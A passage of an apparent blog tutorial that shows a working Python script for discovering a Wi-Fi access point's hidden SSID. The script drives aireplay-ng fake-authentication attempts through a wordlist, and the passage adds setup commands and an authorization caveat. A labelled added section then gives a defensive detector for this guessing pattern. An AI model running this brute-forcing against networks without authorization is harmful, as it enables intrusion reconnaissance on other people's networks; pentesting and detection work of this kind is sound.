2) a wifi card capable of doing injection (I recommend an ALFA AWUS036H);
3) a list of well known SSIDs that you can get here or create yourself.

What I did was try a fake authentication to the Access Point using the names present in a file that I submit to the script, and check whether I got authenticated or not.

First of all you need to create a monitor interface using airmon-ng and launch airodump-ng to identify the AP with the hidden SSID. Once you have done this, write down the channel and the bssid (mac address) of the AP. Destroy the monitor interface and recreate it on the channel the AP you are targeting is working on.
The script works by passing the bssid (mac address) you identified previously and the file containing the (E)SSIDs to probe against as parameters:

    ./hidden_ssid <mac_address> <file_name>

The script works by trying a fake authentication to the AP using all the (E)SSIDs present in the file and checking whether it gets correctly authenticated. This is the command line I use to do the test:

    aireplay-ng --fakeauth 0 -T 1 -a bssid -e essid mon0

The -T 1 option tells aireplay-ng to try only one fake authentication.
The script assumes that mon0 is the interface to be used but, if needed, it's trivial to modify this.
Following is the script.
    #!/usr/bin/env python3
    # script created by Tony 'albatr0ss' Di Bernardo, October 2011
    # you are free to re-use the code as long as you give credit to the author in your works
    import sys
    from subprocess import Popen, PIPE

    if len(sys.argv) < 3:
        print('Usage: ' + sys.argv[0] + ' bssid essid_list')
        sys.exit(1)

    bssid = sys.argv[1]
    essid_list = sys.argv[2]
    print('Searching name for Access Point ' + bssid + ' using file ' + essid_list)

    found = False
    with open(essid_list, 'r') as f:
        for line in f:
            essid = line.strip()          # drop the trailing newline and surrounding blanks
            if not essid:
                continue                  # skip empty lines in the list
            print('Trying Essid: ' + essid)
            # one fake-authentication attempt (-T 1) against the target bssid with this essid
            c = Popen(['aireplay-ng', '--fakeauth', '0', '-T', '1',
                       '-a', bssid, '-e', essid, 'mon0'], stdout=PIPE)
            output = c.stdout.read().decode('utf-8', 'replace')
            c.wait()
            if 'Association successful' in output:
                print('\nFound! Access Point ' + bssid + ' Essid is ' + essid)
                found = True
                break

    if not found:
        print('\nEssid not in file ' + essid_list + ' for Access Point ' + bssid)
You can download it here. You have to decompress it and set the executable flag with:

    tar xfvz hidden_ssid.tar.gz
    chmod +x hidden_ssid

Be wise and use this only on APs you have prior authorization to pentest.
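From the defender's side, what this script leaves on the air is one client MAC sending association requests to a single BSSID with many different ESSIDs in quick succession, which a legitimate client never does. The following is an added example, not part of the original post or the script, that flags that pattern from a list of management-frame records; the record layout (time, station MAC, BSSID, subtype, ESSID) and the sample frames are constructed assumptions, not a real capture.

```python
from collections import defaultdict

# Constructed sample of 802.11 management frames, summarised as
# (time_s, station_mac, bssid, subtype, essid). Format is assumed.
FRAMES = [
    (0.0, "aa:bb:cc:00:00:01", "00:11:22:33:44:55", "assoc_req", "linksys"),
    (0.4, "aa:bb:cc:00:00:01", "00:11:22:33:44:55", "assoc_req", "default"),
    (0.9, "aa:bb:cc:00:00:01", "00:11:22:33:44:55", "assoc_req", "NETGEAR"),
    (1.3, "aa:bb:cc:00:00:01", "00:11:22:33:44:55", "assoc_req", "dlink"),
    (1.8, "aa:bb:cc:00:00:01", "00:11:22:33:44:55", "assoc_req", "belkin54g"),
    (2.2, "aa:bb:cc:00:00:01", "00:11:22:33:44:55", "assoc_req", "HomeNet"),
    # a legitimate client retrying the same (correct) name a couple of times
    (0.5, "de:ad:be:ef:00:02", "00:11:22:33:44:55", "assoc_req", "HomeNet"),
    (3.1, "de:ad:be:ef:00:02", "00:11:22:33:44:55", "assoc_req", "HomeNet"),
]

def find_ssid_guessing(frames, window_s=10.0, min_distinct=4):
    """Return one (station, bssid, essids_tried) tuple for every station that
    sent association requests with at least `min_distinct` different ESSIDs
    to the same BSSID inside some sliding window of `window_s` seconds."""
    per_pair = defaultdict(list)
    for t, sta, bssid, subtype, essid in frames:
        if subtype == "assoc_req":
            per_pair[(sta, bssid)].append((t, essid))
    alerts = []
    for (sta, bssid), events in per_pair.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # advance the window start until the span fits inside window_s
            while events[end][0] - events[start][0] > window_s:
                start += 1
            names = {e for _, e in events[start:end + 1]}
            if len(names) >= min_distinct:
                # report every name this station tried against the BSSID
                alerts.append((sta, bssid, sorted(e for _, e in events)))
                break  # one alert per station/BSSID pair
    return alerts

if __name__ == "__main__":
    for sta, bssid, names in find_ssid_guessing(FRAMES):
        print(f"ALERT {sta} -> {bssid}: {len(set(names))} ESSIDs tried: {names}")
```

A monitor-mode sensor feeding real frames into this check would raise the alert on the second or third guess, long before a long SSID list is exhausted; the thresholds are tuning parameters, not fixed values.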
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.